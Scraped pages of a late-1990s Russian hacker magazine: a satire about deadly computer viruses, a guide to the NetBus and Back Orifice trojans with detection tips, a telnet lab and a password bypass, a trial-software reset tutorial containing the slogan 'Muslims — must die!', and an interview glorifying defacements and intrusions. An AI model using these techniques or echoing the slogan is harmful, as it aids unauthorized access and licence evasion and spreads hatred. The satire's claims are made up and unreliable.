«Из НИИ ЖиА к нам подвезли семерых пациентов: одного блондина, трех брюнетов и четверых лысых. Третий справа показался мне довольно симпатичным. Я начал с него — померил давление, температуру, поинтересовался аппетитом. Пока я заносил его данные в учетную карточку, остальные шестеро драматически скончались. Смерть их была ужасна и омерзительна — они корчились, орали, икали. Наблюдалось обильное слюно- и потоотделение. Я заснял их гибель на видеопленку и увез ее домой — она мне пригодится для развлечения моих гостей, которые будут просить показать им очередной фильм ужасов. Оставшийся в живых пациент, предположительно мужчина 37 лет, впал в коматозное состояние и помещен в палату номер 91. По просьбе друзей из ФСБ в диагноз трупов я вписал «сибирская язва», а чтобы не возникали подозрения в несоответствии симптомов и диагноза, исправил ее на новую разновидность: «новосибирская язва».


Спецвыпуск хакер, номер #001, стр. 001-071-2, Опасная игра со смертью

Опасная игра со смертью

Спецвыпуск хакер, номер #001, стр. 001-071-2

На этом записки главврача трагически обрывались. Но прочитанного было достаточно — я направился прямиком в 91 палату, где пятый год в прохладе кондиционеров нежилась седьмая жертва компьютерного вируса-убийцы. Лишь он мне может рассказать, что же произошло на самом деле. Но, к сожалению, больной отказался вести со мной беседу, смехотворно мотивировав отказ своим коматозным состоянием.

Казалось, расследование зашло в тупик. Но помощь пришла с самой неожиданной стороны. Справа. В момент, когда я покидал больничные покои, по правому плечу мне постучал незнакомый тип. «Войдите!», — ответил я.

— Меня зовут... неважно как меня зовут. Вы, я слышал, интересуетесь вирусом-убийцей? Я был там. Я все это видел. До сих пор по ночам меня мучают кошмары... И Вася, Вася, мой лучший друг... его там постигла позорная погибель.

И тогда, в местной пельменной, за кружкой кофе, незнакомец начал свое повествование.

— В ночь на 25 февраля 1994 года в наш институт провели интернетовскую выделенку. Наш отдел, работающий над проблемой размножения и беременностей рогатого скота, озадачился поисками в Интернете информации по научным разработкам в данной области. С рогатым скотом в Интернете оказались проблемы, поэтому для начала мы решили ограничиться поиском информации по размножению людей. Дело это оказалось увлекательным и захватывающим — Интернет по непонятной причине оказался настоящей кладезем иллюстраций к этому аспекту человеческого бытия. Десятки мегабайт фотографий и текстов на тему человеческого совокупления всего за несколько часов забили наши институтские винчестеры до отказа. НИИ праздновал победу. В два часа ночи, когда новосибирское метро закрывается, чтобы путейцы вывезли скопившуюся за день в тоннелях вечную мерзлоту, я направился домой. В здании института остались лишь семь самых упорных работников, моих подчиненных. Они пообещали к утру разобраться с иллюстративным материалом и выбрать наиболее яркие образцы для публикации в нашем журнале «Животноводчество и Аквариумистика». По их мнению это могло существенно поднять тираж нашего издания. Я не был в этом уверен, но добро им дал.

Придя домой, я позвонил в институт, чтобы узнать, как продвигается работа. К телефону долго никто не подходил, а если даже кто-то и подходил, то трубки не поднимал. Однако вскоре, через полчаса, трубку взял Василий и объяснил мне, что они скачали несколько программ для просмотра картинок с сайта http://ob.da.ru и тестируют их на полную катушку.

На следующее утро я оказался в отделе. Ребята чувствовали себя прекрасно — шутили, курили, делились планами на будущее. Двое из них собирались на следующий день жениться, еще у троих в этот день родились дети. Василий похвастался мне, что изобрел лекарство от рака, и через неделю оно будет готово... эх, им бы еще жить да жить. Мы занялись своими делами, и вдруг, спустя два-три часа, им стало плохо. Первым пожаловался Евлампий: «У меня живот болит, можно я сегодня уйду с работы пораньше?». Я не обратил на это внимания и влепил ему выговор за симулянство. Но через десять минут у Афанасия и Поликарпа заболели зубы. Спустя сорок две минуты (я специально засекал время — мне было все это в диковинку и потому любопытно) все семеро начали кашлять, сморкаться. Конечности их принялись дергаться, глаза выкатились, рты жадно хватали воздух. Это слишком походило на дискотеку, чтобы быть правдой. Я приказал прекратить балаган. Но тут они повалились на пол, соскребывая ногтями ног лак с паркета, и тогда я понял, что все идет не совсем так, как было запланировано в нашем распорядке дня, утвержденном, кстати, самим генеральным директором.


Спецвыпуск хакер, номер #001, стр. 001-071-3, Опасная игра со смертью

Опасная игра со смертью

Спецвыпуск хакер, номер #001, стр. 001-071-3

Секретарша вызвала «скорую помощь», и через час нам позвонили из больницы и сказали, что наши сотрудники поотбрасывали копыта на все четыре стороны. Лишь Афанасий — любимец коллектива — остался жить своей тихой жизнью коматозника-отшельника.

Поначалу мы решили, что они все отравились. Но эту версию пришлось отмести — зарплату работникам не платили уже полгода, и есть им было нечего. Тогда началось расследование, в ходе которого было обнаружено, что одна из программ для просмотра файлов графического формата JPEG оказалась заражена опаснейшим неизведанным вирусом. Мы в срочном порядке отформатировали все винчестеры в институте. Так как не были уверены, что простое форматирование погубит вирус (ведь, например, не все бактерии погибают при кипении), для пущей уверенности в безопасности мы проделали форматирование три раза, после чего все компьютеры были вывезены за город и скрупулезно закопаны в землю.

Приехавшие из Центра эксперты переписали один экземпляр вируса на магнитооптический диск и подвергли его экспериментам. Вирус этот получил название СКИД — Синдром Компьютерного Иммунодефицита. Принцип его работы достаточно хитроумный. Как известно, в крови человека находится насыщенный раствор клеток-киллеров. Эти клетки шныряют туда-сюда по нашей развитой гемоглобинной системе, выискивая инородные белки-антигены и уничтожая их, тем самым защищая наш организм от столь нелюбимых в народе инфекций. СКИД, по аналогии со СПИДом, дезориентирует киллеров, они теряют способность отличать чужеродные тела от доброкачественных. И вследствие этого начинают применять свою силу против собственных клеток организма — наступает иммунодефицит организма. Электронный вирус, проникший в операционную систему «Windows 3.11», принялся управлять строчной разверткой монитора, пока ни нащупывал резонансную частоту кровяных клеток-киллеров. Так как резонансная частота сугубо индивидуальна и заранее неизвестна, а попасть наугад шансы практические нулевые, то происходит сканирование всех возможных частот, на каждой из которых вирус задерживается лишь на 1-2 секунды. При удачном попадании клетки-киллеры сходили с ума. Сумасшествие кровяных телец длится всего несколько секунд, и для обычного человека это чревато лишь пустяками типа насморка или эпилептического припадка (если кровь попросту потечет в другую сторону, против часовой стрелки). Но для ослабленных недоеданием, бессонницей и половым истощением (не забывайте, чем именно они занимались той ночью!) семерых сотрудников этих нескольких секунд оказалось достаточно для того, чтобы их имунная система оказалась уничтоженной на корню. Они были обречены. Для меня это была самая большая трагедия в моей жизни, тем более, что незадолго до смерти Поликарп занял у меня до зарплаты 4 000 долларов на покупку велосипеда.


Спецвыпуск хакер, номер #001, стр. 001-071-4, Опасная игра со смертью

Опасная игра со смертью

Спецвыпуск хакер, номер #001, стр. 001-071-4

На этих словах мой собеседник, который отказался назвать свое имя и показать лицо, зарыдал. Я покинул его в той заброшенной пельменной, наедине со своим горем и неоплаченным счетом за девяносто съеденных нами вареников.

Тем не менее остались без ответа еще важные вопросы — откуда взялся этот вирус, найдено ли для него противоядие и, наконец, возможно ли существование других смертельных компьютерных вирусов? Эти мысли привели меня в самое неожиданное место — в Москву.

Неподалеку от Чистых Прудов, между обычной московской школой и краснознаменным дельфинарием имени Ф.Э.Дзержинского стоит скромное, незаметное со стороны сорокаэтажное серое здание. Оно окружено ограждением из колючей проволоки, что в грозу искрится мелкими веселыми искорками в 8 тысяч вольт каждая. Из-за бетонного забора дотошный прохожий услышит лай сторожевых волкодавов, а единственный въезд вовнутрь охраняет вооруженный до зубов шлагбаум.

Здесь находится Центральный Штаб Российского Государственного Фонда Борьбы С Электронными Вирусами. Мне удалось встретиться в кулуарах Штаба с заместителем директора Штаба, генерал-лейтенантом Лоджинским, который просил меня соблюсти строгую конфиденциальность беседы и ни в коем случае не называть в статье его имени.

Интервью

с генералом

Лоджинским.

— Случай в Новосибирске, к сожалению, не уникален. Аналогичные истории происходили в США, Индонезии и Чечне. Государственные секретные службы, само собой, старались замять эти грязные истории, дабы не давать поводов для паники среди мирного населения, которая могла привести к социальным катаклизмам, вспышкам насилия и мародерства. В период с 1980 по 1998 год было отловлено 7 смертоносных вирусов, что в семь раз больше, чем в семидесятые годы, когда не было зафиксировано ни одного вируса. Все опасные программы подвергаются тщательному анализу в лабораторных условиях. Работа лаборантов при этом весьма рискованная — по крайней мере четверо из них погибли при экспериментах за последние два года. Что касается усопших собак и крыс, то тут мы вообще сбились со счета. При выполнении экспериментального задания погибла даже любимая такса моей супруги.

— Все ли вирусы устроены так же, как «новосибирская язва»?

— Монитор, безусловно, является самым надежным средством инфицирования пользователя. Даже если не принимать во внимание глупых бредней про «двадцать пятый кадр», разнообразие средств и методов поражает своими масштабами даже видавших виды патологоанатомов. Возьмите, например, вирус «Кентукки-44», названный так потому, что один фермер из Кентукки впервые обнаружил его действие, когда смертью храбрых пали его 44 кролика, пробравшихся под покровом ночи к бортовому компьютеру картофелеуборочного комбайна. Вирус заставляет лучевую трубку монитора, в придачу к трем цветовым каналам RGB (красный-зеленый-голубой), генерировать четвертый, невидимый ультрафиолетовый луч. Постоянное воздействие ультрафиолетового излучения расширяет капиллярные вены глазного яблока, и при длительном воздействии они лопаются, повреждая нервную систему зрительного органа и прилегающего к нему, с позволения сказать, мозга. В лучшем случае человек мгновенно отбрасывает коньки. В худшем случае он теряет зрение и всю оставшуюся жизнь живет слепцом, неспособным даже к таким жизненно необходимым развлечениям, как просмотр фильмов Арнольда Шварценеггера, невзирая на сурдоперевод. Вирус также распространился через сети ИнтерНет, но, к счастью, не сумел сильно навредить благодаря казусу — автор вируса прицепил его к программе, якобы ускоряющей процессор пентиум в девяносто раз. Но по оплошности он забыл приложить к программе файл с указанием пароля и серийного номера продукта. В результате большинство пользователей не смогло ее запустить, и до сих пор от горя рвут на себе волосы и выщипывают брови, ругая свои пентиумы за тормознутость, но не подозревая о том, что сами чудом остались живы.


Спецвыпуск хакер, номер #001, стр. 001-071-5, Опасная игра со смертью

Опасная игра со смертью

Спецвыпуск хакер, номер #001, стр. 001-071-5

— Бывают вирусы более хитроумного действия. Один хакер из Кении сделал программу, позволяющую нагревать микросхему IDE интерфейса в материнских платах ASUStek до критической температуры. Микросхема плавилась, а содержимое ее — концентрированный летучий цианид фреона испарялся в атмосферу, отравляя все тех, кто находился в радиусе 50 метров от компьютера. По новейшим научным исследованиям нашего Штаба, это эквивалентно диаметру в целых 100 метров! Кто знает, сколько бы бед натворил этот вирус, если бы хакера по ошибке не расстреляли вскорости во время очередного еженедельного государственного переворота в Кении.

— Насколько велика опасность пользователя подхватить фатальную заразу? Есть ли способы предохранения?

— Как и в случае со СПИДом, есть определенные группы риска, то есть люди, которые чаще всего могут оказаться инфицированными смертоносными электронными вирусами. Это в первую очередь хакеры, любители компьютерных игр, люди, озабоченные компьютерной порнографией, и все пользователи слабозащищенных операционных систем, таких как DOS, Windows 95, Windows NT, OS/2, Unix, MacOS. Наш штаб ведет неустанную работу по обнаружении личностей, принадлежащих к группам риска, и незаметной для окружающих их физической ликвидации. К сожалению, лишь такие кардинальные меры способны локализовать очаг эпидемии.

На этих словах я сердечно попрощался с генерал-майором Лоджинским. Пусть вас не смущает, что в начале статьи я его назвал генерал-лейтенантом. За время нашей беседы его понизили в звании за разглашение государственных секретов. Тем не менее он подмигнул мне на прощание, взял расписку о том, что я не принадлежу к группе риска, и отпустил меня восвояси. Именно в деревне Свояси я сейчас заканчиваю написание этой статьи.


Спецвыпуск хакер, номер #001, стр. 001-071-6, Опасная игра со смертью

Опасная игра со смертью

Спецвыпуск хакер, номер #001, стр. 001-071-6

Полагаю, что этот — не побоюсь этого слова — сенсационный материал никого не оставит равнодушным. Что-то читатель примет на веру, в чем-то начнет сомневаться. Безусловно, в рассказе Лоджинского есть моменты, вызывающие у меня сомнения, например, история о погибшей таксе его супруги. В кинологическом клубе, где я наводил справки о его таксе, мне сообщили, что ее на самом деле похитили инопланетяне. В остальном же обе рассказанные истории не вызывают у меня ни малейших сомнений. Очень прошу читателей со всей серьезностью отнестись к этой проблеме и подумать


Спецвыпуск хакер, номер #001, стр. 001-074-1, NetBus — троянец-игрушка!

NetBus — троянец-игрушка!

Спецвыпуск хакер, номер #001, стр. 001-074-1

Doc (serguei@earthling.net, ICQ:10811323

Идея заслать во вражеский стан «своего» человека, который мог бы собирать информацию, совершать диверсии и вообще выполнять любые задания центра, далеко не нова. Но лишь в относительно недавнее время она стала так массово и успешно применяться для компьютерных диверсий. По-видимому, изготовители хакерских утилит наконец прониклись идеями дяди Билли, который уже давно пропагандировал технологию клиент-сервер.

Итак, по порядку. Предположим, что кто-то хочет собрать некоторую информацию или совершить какое-либо действие на чужой машине. Есть 2 способа это сделать. Можно заранее проинструктировать программу, что делать. Типа: «По прибытии отыщешь мне каталог Windows, в нем соберешь все файлы с расширением PWL и отправишь мне по почте». Но это старо, нединамично, неинтерактивно и пошло — в общем, не прикалывает. Лучше сказать программе так: «По прибытии выходишь со мной на связь и выполняешь мои указания». Таким образом программа становится «глазами» и «руками» в чужом компьютере. Имея их, можно выполнить многое. Не буду расписывать все команды, реализованные в конкретной версии двух наиболее популярных (на мой взгляд) троянов — НетБаса (NetBus) или БэкОрифиса (Back Orifice). Их увидит любой, запустив программу управления соответствующего трояна. Для примера приведу лишь несколько самых прикольных/полезных команд НетБаса.

• Открыть/закрыть подставку для чашки кофе, один раз или с интервалом

• Поменять местами клавиши мыши

• Выполнить команду/запустить программу/перейти на определенный URL

• Управлять координатами курсора мыши

• Показать диалог с выбором и сообщить выбор

• Зашатдаунить винды/отлогинить пользователя

• Посылать/принимать нажатия клавиш (текст)

• Получить снимок экрана

• Просмотреть содержимое жестких дисков, скачать/заслать/удалить файл

• Записать текущий звук и прислать

• Открыть/закрыть/сфокусировать окно

Вернемся к технологии. Итак, центральное место в работе этих программ занимает связь между сервером (засланным на чужой компьютер) и клиентом (управляющим инструментом).

Для начала поймем, как происходит связь 2-х компьютеров через Интернет. В случае НетБаса используется протокол TCP. Это похоже на разговор по телефону. Представь себе, что в компьютере есть более 30 тысяч телефонов (портов) и с каждого можно позвонить на каждый данный компьютер или на удаленный. После соединения можно передавать/принимать информацию. Правда, по некоторым телефонам не дозвониться, так как они уже заняты системными службами.

Сервер НетБаса действует следующим образом. Попав на компьютер и запустившись, он устраивается у условленного телефона и ждет звонка. Когда ему звонят, он снимает трубку и представляется: «Здравствуйте! НетБас версии 1.62 слушает. Чем я могу Вам помочь?» До версии 1.70 номер порта был фиксированный — 12345. Таким образом проверить наличие на машине сервера было крайне просто: надо просто законнектиться на этот порт и посмотреть, будет ли ответ. (В нормальном случае либо никто не ответит, либо просто пошлют.). Начиная с версии 1.70, номер порта можно задать самому. Когда номер порта неизвестен, можно лишь последовательно прозванивать все незарезервированные порты (после 1024). Руками это делать — умаешься, тут потребуется программа с возможностью сканирования диапазона портов (Port Scanner).


Спецвыпуск хакер, номер #001, стр. 001-074-2, NetBus — троянец-игрушка!

NetBus — троянец-игрушка!

Спецвыпуск хакер, номер #001, стр. 001-074-2

«А если какой-то гад засунул этот твой НетБас на мою машину?» — спросишь ты. А вот тогда тебе нужно в любой момент времени посмотреть список текущих соединений, и если кто-то на твоей машине уже полчаса треплется с порта 12345 — значит, у тебя ночует НетБас. Проверить текущие соединения легко: для этого запусти netstat.exe в командной строке. И эта прога тебе все покажет: кто, когда, с кем, во сколько, сколько заплатил и что он ел на завтрак.

Ну и самый простой и надежный способ — исследовать свой registry. Для этого достаточно запустить regedit.exe. В разделе HKEY_CURRENT_USER есть подраздел PATCH. И если ты сам не играл с сервером НетБаса, значит, им у тебя поиграл кто-то другой или ты сам, о том не подозревая, его установил ;-).

Гораздо более профессионально и продуманно сработан БэкОрифис. Приведу два примера.

Первый — протокол связи. Описанным выше способом отслеживаются сеансы связи NetBus, но не Back Orifice, потому как он не пользуется телефонной связью (TCP). Возникает законный вопрос: как же он держит связь, если не через телефон? А очень просто — через пейджер (протокол UDP). Как видно из аналогии, подобная связь менее удобна — при ней нет соединения как такового. То есть ты посылаешь сообщение и не знаешь, получил ли его абонент (может, он сейчас в метро ;-). Более того, посылаемые UDP — пакеты шифруются. В отличие от НетБаса, который общается открытым текстом.

Второй — открытый интерфейс. БэкОрифис предусматривает использование плагинов (plug-in). Чтобы добавить функцию, которая не была включена в стандартный набор, достаточно написать плагин в виде ДЛЛ и в нем ее реализовать. Спецификации прилагаются. Не так уж сложно для программиста средней руки. Зато какое поле для фантазии и экспериментов над чужими машинами!

Но хватит теории — перейдем к практике. Посмотрим, как можно побаловаться с НетБасом и даже хакнуть его «подручными» средствами, пользуясь ламерским программным исполнением оного. Для данной лабораторной работы нам понадобится НетБас до версии 1.70 и программа telnet.exe (входит в стандартный набор Windows).

1. Запускаем «patch.exe /noadd »

2. Запускаем telnet.exe

Опция noadd говорит серверу НетБаса не прописывать себя в автозагрузку виндов, а сработать одноразово. (Надеюсь, ты не хочешь сам себя заразить трояном?)

Теперь надо связаться с засевшим у тебя на компе агентом. Если помнишь, он ждет на порте 12345. В программе телнет выбираешь меню connect пункт Remote System. В поле hostname набираешь localhost (то есть коннектишься к собственному компьютеру), а в поле port — 12345 и давишь на пимпу connect.

Если троян на месте, он живо откликнется, сообщив свою версию. Например, «NetBus 1.60».

Он готов к работе. Можешь набрать GetInfo и нажать ввод — НетБас выдаст тебе информацию о компьютере.


Спецвыпуск хакер, номер #001, стр. 001-074-3, NetBus — троянец-игрушка!

NetBus — троянец-игрушка!

Спецвыпуск хакер, номер #001, стр. 001-074-3

Я еще не упомянул о возможности задать серверу НетБаса пароль, чтобы никто, кроме установивших его, не могли этим сервером воспользоваться. В этом случае НетБас тебя поприветствует чуть иначе. На конце появится буква «х» : «NetBus 1.60 х».

Для установки пароля достаточно набрать «ServerPwd;твой пароль».

Чтобы убедиться, что пароль задан, можно сделать Disconnect в телнете и заново попробовать законнектиться. Теперь сервер будет отказываться выполнять твои команды, резонно требуя пароль. Пароль передается следующим образом: «Password;0;твой пароль».

Сервер отвертит «Access;1», если пароль подходит, и «Access;0», если пароль задан неверно.

Пытливый ум непременно заинтересуется: «А что означает этот ноль в команде ввода пароля? А если я туда поставлю не ноль, а, скажем, единицу? Например, «Password;1;я от Иван Иваныча». И будет прав. Произойдет чудо. В этом случае сервер примет от тебя абсолютно любой пароль. Даже такой бредовый. Ну, вот ты и хакнул пароль в НетБасе. Мелочь, а приятно. Ну а как установить свой пароль, ты уже знаешь. Побалуйся, поиграй, только когда наиграешься, не забудь выгрузить сервер НетБаса из памяти — «patch.exe /remove» (если не хочешь, чтобы кто-нибудь другой поиграл с тобой. Например, я :)).

Программа

Установка пароля на программу

Файловые операции

Передача сообщений

Управление виндами

FTP/HTTP сервер

Номер порта

Управление мышью

Дамп экрана

Тащит

пароли

Встроеный I.P. сканер

Acid Shiver Нет Есть Нет Есть FTP Задается Нет Нет Нет Нет

Backdoor

Control Есть Есть Есть FTP Есть

Back Orifice Есть Есть Есть Есть UDP/TCP Задается Есть Есть Есть

FTP

BO FTP FTP Задается

ButtSniffer Есть

Speakeasy FTP

Deep Throat Есть Есть Есть Есть оба 31338 Есть Есть Есть

Evil FTP Есть Есть FTP 23456 Нет Нет Нет

Executor

Fatal Есть

Network

FTP Commander 99 Есть Есть TCP Есть Есть

Gate 6969

Crasher

Girl Friend Есть Есть Есть Есть Задается Есть Есть

Hacker’s Paradise Есть Есть Есть Есть TCP 40426 Есть Есть Есть

ICQ Trojan Есть FTP

Master’s Paradise Есть Есть Есть Есть FTP 40426 Есть Есть

Millineum Есть Есть Есть TCP 20001 Есть Есть

Netbus Есть Есть Есть Есть FTP Задается Есть Есть Есть

NetMonitor

NetSpy Есть Есть TCP 1024-25

Phase Zero Про- Есть Есть Есть FTP Задается Есть

верка IP

Remote Wave Server Есть TCP

Setup Trojan Откл. Есть Есть TCP Есть

Shock Rave Есть FTP

Socket’s of Troy Есть Есть Есть FTP Есть

Senna Trojan Builder Есть Есть Есть Есть FTP Задается

Stealth Spy Есть Есть TCP

Remote Win Shutdown Есть Есть TCP

Tele Commando Есть Есть TCP

Voodoo Doll TCP

Win Crash Есть Есть Есть Есть FTP 1213-1213 Есть

5714-5741

WinHack Gold Откл. Есть Есть TCP Есть


Спецвыпуск хакер, номер #001, стр. 001-077-1, Бедность не порок,

Бедность не порок,

Спецвыпуск хакер, номер #001, стр. 001-077-1

а способ шевелить мозгами...

Сaptain Колбасьев

Те, кто лазит по Интернету, наверняка натыкались на целые залежи очень полезных прог, но все они, как правило, либо шароварные (т.е. за них надо платить зеленые бабки, чтобы прислали код), либо с ограниченным временем действия. Таких программулек накапливается куча, и обходиться без них как-то не хочется —привыкаешь, как к помойному ведру. Я бы с удовольствием платил бы за них, но так как постоянная статья дохода, стипендия, составляет всего 4$ USA (да и ту еще не дадут вовремя), приходится крепко думать, как потратить эти «бешеные деньги» и шевелить мозгами в другом направлении.

Очень многие программки с ограниченным временем действия (или по-русски trial’ы) после деинсталляции и повторной установки все равно отказываются работать. (Про)двинутый Чайник сообразит, что прога где-то оставила свой хвост и, натыкаясь на него, отказывается работать. Что делать?

Продвинутый хакер сразу кинется исследовать прогу, чтоб взломать ее и изменить код, отвечающий за проверку времени действия. А что делать Чайнику? Сидеть и ждать, когда другие взломают, и потом долго лазить по хакерским сайтам в надежде найти код или пароль для любимой программки? Ни в коем случае! Лучше попытаемся сделать это все своими шаловливыми ручками.

Немного теории и умозаключений. Где может прятаться хвост? Мест не так уж и много:

1. cистемный регистр (если у тебя, конечно, стоит Windows95/98 или NT);

2. файл win.ini (системный файл — анахронизм (пережиток, родные вы мои), тянущийся со времен Windows3.1) ;

3. создается программой собственный хитрый файл в каталоге Windows, в котором регистрируются все изменения (обычно создается при первом запуске установленной программы).

Ну а теперь чем и как все это отловить?

Сразу выражу благодарность стойкому борцу с хакерами всех мастей — журналу “GAME.EXE“ (под предводительством бравого казачьего атамана Михайло Новикова) за то, что на CD-диске к журналу №2 за 1999 год в разделе «полезные утилиты» выложил очень полезную утилиту Regmon95 (Regmon for Windows NT/9x Mark Russinovich and Bryce Cogswell http://www.sysinternals.com). Кстати, с сайта www.sysinternals. com скачайте еще одну полезняшку (как говорит Евгений Козловский — кто не знает: www.computerra.ru) по имени Filemon (Filemon for Windows NT/9x Mark Russinovich and Bryce Cogswell www.sysinternals.com). Кратенько опишу, что это такое.

Как ты понял из названия, Regmon for Windows NT/9x — это не что иное, как монитор регистра, который отслеживает все обращения к регистру любыми программами и ведет запись всех обращений, а Filemon — фиксирует все обращения программ к файлам (гениально!). Мощные инструменты для ловли нежелательных связей.

А теперь испробуем на примере эту комбинацию из трех пальцев (пардон, программ). У меня есть любимая программка NET-mon v.2.0 для контроля скорости соединения с Интернетом (даже и не вспомню, откуда ее выловил, если приспичит, то попробуй глянуть на каком-нибудь www.download.ru), но вот беда: через 10 дней после установки она (программа) прекращает работать.


Спецвыпуск хакер, номер #001, стр. 001-077-2, Бедность не порок,

Бедность не порок,

Спецвыпуск хакер, номер #001, стр. 001-077-2

Делаю раз. Запускаю Regmon.

Делаю два. Запускаю Filemon.

Делаю три. Запускаю NETmon.

Смотрю — и волосы дыбом. В окнах Regmon’а и Filemon’a — тьма всяких записей. Если чуток напрячься, то вполне можно найти знакомое название «netmon» и в опциях программ в разделе «фильтр» поставить netmon. Закрываю все и открываю заново. Вот теперь порядок, зафиксированы записи, относящиеся только к нужной программе. Ну а теперь ну очень тщательный (скрупулезный, для умных) анализ полученной информации.

В Filemon что-то ничего в глаза не бросилось. Банальное обращение проги к своему ехе’шному файлу и dll’елке.

В Regmon’е уже интересней. Сразу замечается наглое обращение программы к одному и тому же ключу регистра.

Два раза щелкаю по выбранной записи в регмониторе, и открывается виндовсный Regedit, откуда с чистой совестью удаляется треклятый ключ. (Прежде, чем лезть в системный реестр, сделай резервную копию файлов реестра (systm.dat и user.dat из корневого директория Виндов), чтобы не пришлось рвать волосы на одном месте и переустанавливать систему).

Ну а теперь осталось только посмотреть на конечный результат. Запускаю NETmon — все в порядке, фокус удался, факир оказался трезв, что, в общем-то, странно, учитывая специфику «тонкой» работы с реестром. Все. Фанфары и поздравления. Низкие поклоны и широкий занавес. Концерт закончен. А по традиции, следуя классическим библейским традициям (Muslims — must die!), вручаю удочку — рыбу при наличии извилистых мозгов и прямых (обязательно!)


Спецвыпуск хакер, номер #001, стр. 001-078-1, Хакерская группа KpZ — изнутри

Хакерская группа KpZ — изнутри

Спецвыпуск хакер, номер #001, стр. 001-078-1

Сергей Покровский (pokrovsky@xakep.ru)

Чтобы ввести вас в курс дела, для начала хотелось бы кратко рассказать вам о развитии хакерского движения в России. Началось все практически с того времени, когда в нашей стране для простого человека появилась возможность выйти во Всемирную Паутину. За короткий период времени Интернет охватил все регионы России и принял глобальный характер. В нашей стране международная Всемирная Сеть была в то время еще новинкой, несмотря на то, что с каждым днем к ней присоединялось все больше и больше людей. О проделках так называемых хакеров можно было услышать только из-за «бугра» или увидеть в кино, но наши люди не заставили себя долго ждать. И вскоре в России был организован отдел по борьбе с компьютерными преступлениями, в московских газетах появились статьи о «маленьких гениях-хакерах», которые теперь отсиживают срок. На самом деле были пойманы бедные детки, студенты, которые просто хотели подзаработать немного денег через Интернет, заказывая товар на дом по фальшивым кредиткам (к реальному хакерству это ну никак нельзя было отнести). А тем временем, пока люди из Федеральной Службы Безопасности гонялись за этими «хакерами», другие спокойно себе сидели дома и получали новые знания, чувствуя себя в полной безопасности. Можно даже сказать, что хакерство в России развивалось с огромной скоростью и при этом не ощущало никаких преград со стороны органов правопорядка.

Группа, о которой пойдет речь, была образована в конце августа 1998 года. Как раз тогда, когда тысячи подростков, просмотрев дошедший до России фильм «Hackers» и начитавшись статей про хакеров, ринулись в Интернет, возомнив себя профессиональными взломщиками. И первоначальная идея группы состояла в том, чтобы показать детям, что они не правы, и Всемирная Паутина — не место для подобного развлечения и для людей с манией величия. Был зарегистрирован сервер, который носил название «Муд$#и Русского Интернета» и ежедневно пополнялся списком «хакерских страничек», которые через некоторое время группой же и уничтожались. Так же, если в каком-либо чате отсутствовала цензура или опять-таки появлялись люди и кричали «Я крутой хакер, щас я вас всех занюкаю...», и с этим не могли справиться администраторы серверов, чат по «неизвестным никому причинам» выходил из строя. За месяц, поняв, что молодежь не остановить, что они все равно будут продолжать «нюкать» и забивать почту пользователям, KpZ-шники решили оставить их в покое и заняться чем-нибудь поважнее.

Первоначально в KpZ было около 10 человек, но месяц спустя из-за отсутствия знаний большинство было «уволено». Осталось 5 человек:

Tarantino: художник,

programmer

Delta: Языки: VB, DELPHI, C++

OS: UNIX, NT

MAL: Языки: VB, BASIC, C,

C++, ASM, DELPHI....

OS: winNT/98, UNIX

v00d00: Языки: BASIC, VB,

C++, ASM, PASCAL,

DELPHI, Perl

OS: Windows, Linux

В дальнейшем были приняты еще два человека:

Spider: Языки: VB, С++,JAVA,

PERL, немного ASM....

OS: Unix, NT

Mishgan: Языки: Basic,

cgi scripts

OS: WinNT

Название группы фактически не несет никакого определенного смысла и расшифровывается как Камера Предварительного Заключения.


Спецвыпуск хакер, номер #001, стр. 001-078-2, Хакерская группа KpZ — изнутри

Хакерская группа KpZ — изнутри

Спецвыпуск хакер, номер #001, стр. 001-078-2

Итак, началось все с того, что администрация известного московского компьютерного клуба «Орки» нанесла некоторый моральный ущерб одному из KpZ. Расплата последовала немедленно, и некоторое время на их серверах можно было видеть уникальное оформление в стиле KpZ, но это был не конец, а чтобы описать все, что с ними случилось, нужно начинать новую статью.

Некоторые последующие взломы имели заказной характер и были успешно выполнены на все сто процентов.

Больше в российском Интернете ничего привлекательного для KpZ не осталось, и им пришлось двинуться дальше и перейти на международные правительственные и военные сети. С этим и пришло мировое признание и известность. Вот выдержка из новостей Биккеля (судите сами):

Ну и это, естественно, далеко не все, что было взломано группой KpZ. В настоящее время из-за большого интереса к группе определенных отделов безопасности некоторые люди, к сожалению, покинули группу и занимаются «сольной, самостоятельной деятельностью».

Состав KpZ на сегодня:

MAL, Mishgan, v00d00.

Этим оставшимся

в группе людям

мы и задали

несколько вопросов.

X: С чего вдруг все началось? Что, сидели, пиво пили и вдруг подумали: «А не стать ли нам крутой хацкерской группой»? :)

Mishgan: Ну, началось, мне кажется, у каждого из нас все постепенно. Сначала научились пользоваться нюком, потом начали тщательно изучать различные операционки, так, постепенно развиваясь, мы стали такими, какие есть на данный момент. Потом, поняв, что выбрасывание людей из чатов и занятия подобного рода слишком надоели и стали вовсе неинтересными, мы решили

собрать группу, которая будет заниматься взломами удаленных компьютеров в сети Интернет.

Ну и пошло-поехало... :-)

MAL: Ну, в принципе, да. Но это так, образно, а если точнее, то помню, сидел я в сети, и шлет мне знакомый по ICQ файло какое-то в текстовом формате, а

далее сообщение такого приблизительно содержания: «Организовывается группа по борьбе с недоразвитыми админами и позорными сайтами. Для вступления заполните анкету и отошлите обратно мне.» Так было набрано около 10-15 человек, половина из которых в последующее время была отсеяна. Вот таким образом и была образована группа.

X: А чем вы занимаетесь в обычной жизни?

Mishgan: Я учусь в средней школе, в 10 классе. Мне 15 лет. Можно сказать, что я — хорошист. :) Учусь на 3-4. Кстати, в нашей школе даже нет предмета «информатика». Вот такая вот школа... :)

Приходится все познавать самому: читать много книг на любые компьютерные темы, экспериментировать и делать многое другое без какой-либо помощи окружающих. В недалеком будущем собираюсь пойти работать в техподдержку к какому-нибудь провайдеру.

MAL: В обычной жизни? Да пока ничем... Но, естественно, моя будущая работа, специальность будет связана с Интернетом. Иначе и быть не может. :)

X: Для чего вам все это нужно?

Mishgan: Я считаю, нужно все это прежде всего для глубоких знаний. А знания всегда нужны... Например, если ты супер-хацкер, знаешь множество языков программирования, много операционных систем и другие различные примочки, то тебя любая компьютерная фирма с руками оторвет и будут платить нехилые деньги. А еще я просто-напросто получаю удовольствие от хакинга, веселюсь (есть в этом деле и веселые моменты) и многое другое. Следовательно, все это мне нужно для будущей профессии, развлечений , все это нужно мне прежде всего для себя.


Спецвыпуск хакер, номер #001, стр. 001-078-3, Хакерская группа KpZ — изнутри

Хакерская группа KpZ — изнутри

Спецвыпуск хакер, номер #001, стр. 001-078-3

